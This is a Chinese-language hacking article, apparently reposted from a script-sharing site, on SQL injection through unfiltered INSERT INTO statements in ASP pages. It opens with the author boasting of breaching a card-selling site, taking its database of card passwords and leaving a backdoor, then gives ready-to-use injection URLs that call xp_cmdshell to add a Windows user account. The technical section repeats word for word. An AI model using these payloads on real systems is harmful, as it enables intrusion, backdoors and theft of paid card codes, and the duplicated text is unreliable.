巧用數(shù)據(jù)庫insert Into進(jìn)行入侵注入
發(fā)布日期:2021-12-27 11:25 | 文章來源:腳本之家
剛才到了酷吧,坐在收銀臺旁邊和收銀的MM聊了幾句話;
突然看到"電影影線"有張海報,上面寫著:
凡是購買該站點卡密碼最后一位數(shù)是6或7便可獲贈面值5元的易卡一張;
我想,這個網(wǎng)站整個數(shù)據(jù)在我手里,我要是把那幾十萬張卡全拿去換錢不是發(fā)達(dá)了?
隨即馬上到他服務(wù)器把庫拿下來,順便在服務(wù)器上再留個后門;
在過程中有另一個想法便是本文的重要點;利用insert Into 進(jìn)行注入。
============================================= 關(guān)于SQL注入,以前常用的或很多朋友所懂的也只不過是在select 語句中ID=變量未過產(chǎn)生的注入點,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我們可否利用insert Into Table的語句進(jìn)行注入呢?
這樣的話,我們可以在某某有漏洞的網(wǎng)站上填寫QQ或Email或地址的地方執(zhí)行任何命令了哦.
記得以前粗略地和"亂刀"討論過,不過一直沒有實際行動,剛才發(fā)現(xiàn)了一下,原來真的可以做到這一點。呵呵。舉下例: 某個頁面xiaomo.asp中有如下一句代碼: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我們可以利用Request("U")未過濾的變量執(zhí)行任意系統(tǒng)命令. 這段很簡單,Request("U")在語句后面,直接提交: http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一個xiaomo密碼為aa的系統(tǒng)用戶 因為構(gòu)造的代碼變成了: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
當(dāng)然理所當(dāng)然地"正確"執(zhí)行了。 ============================================= 我們換個思路,如果頁面中的漏洞代碼是: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,這該怎么辦呢? 其實也很簡單,變通一下即可,提交: http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出來了沒?第一個變量代表了要寫入的所有變量,而后面就不而而至了,哈哈。。 但有個問題是,我們必須得知道對方語句是怎么寫,利在檢查指定程序漏洞時所應(yīng)用
============================================= 關(guān)于SQL注入,以前常用的或很多朋友所懂的也只不過是在select 語句中ID=變量未過產(chǎn)生的注入點,例如http://www.gzint.com/xxx.asp?id=1 ;exec master..xp_cmdshell "net user xiaomo aa /add"-- ============================================= 我們可否利用insert Into Table的語句進(jìn)行注入呢?
這樣的話,我們可以在某某有漏洞的網(wǎng)站上填寫QQ或Email或地址的地方執(zhí)行任何命令了哦.
記得以前粗略地和"亂刀"討論過,不過一直沒有實際行動,剛才發(fā)現(xiàn)了一下,原來真的可以做到這一點。呵呵。舉下例: 某個頁面xiaomo.asp中有如下一句代碼: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’"&Request("u")&"’)"
我們可以利用Request("U")未過濾的變量執(zhí)行任意系統(tǒng)命令. 這段很簡單,Request("U")在語句后面,直接提交: http://localhost/xiaomo.asp?u=2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
便可添加一個xiaomo密碼為aa的系統(tǒng)用戶 因為構(gòu)造的代碼變成了: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’1’,’1’,’1’,’1’,’2’);exec master..xp_cmdshell "net user xiaomo aa /add"--
當(dāng)然理所當(dāng)然地"正確"執(zhí)行了。 ============================================= 我們換個思路,如果頁面中的漏洞代碼是: Conn.execute "insert into admin (adminid,password,logintimes,usertype,level) values (’"&Request("u")&"’,’1’,’1’,’1’,’1’)"
Request("u")跑到前面去了,這該怎么辦呢? 其實也很簡單,變通一下即可,提交: http://localhost/xiaomo.asp?u=3’,’1’,’1’,’1’,’1’);exec master..xp_cmdshell "net user xiaomo aa /add"----
看出來了沒?第一個變量代表了要寫入的所有變量,而后面就不而而至了,哈哈。。 但有個問題是,我們必須得知道對方語句是怎么寫,利在檢查指定程序漏洞時所應(yīng)用
版權(quán)聲明:本站文章來源標(biāo)注為YINGSOO的內(nèi)容版權(quán)均為本站所有,歡迎引用、轉(zhuǎn)載,請保持原文完整并注明來源及原文鏈接。禁止復(fù)制或仿造本網(wǎng)站,禁止在非www.sddonglingsh.com所屬的服務(wù)器上建立鏡像,否則將依法追究法律責(zé)任。本站部分內(nèi)容來源于網(wǎng)友推薦、互聯(lián)網(wǎng)收集整理而來,僅供學(xué)習(xí)參考,不代表本站立場,如有內(nèi)容涉嫌侵權(quán),請聯(lián)系alex-e#qq.com處理。
相關(guān)文章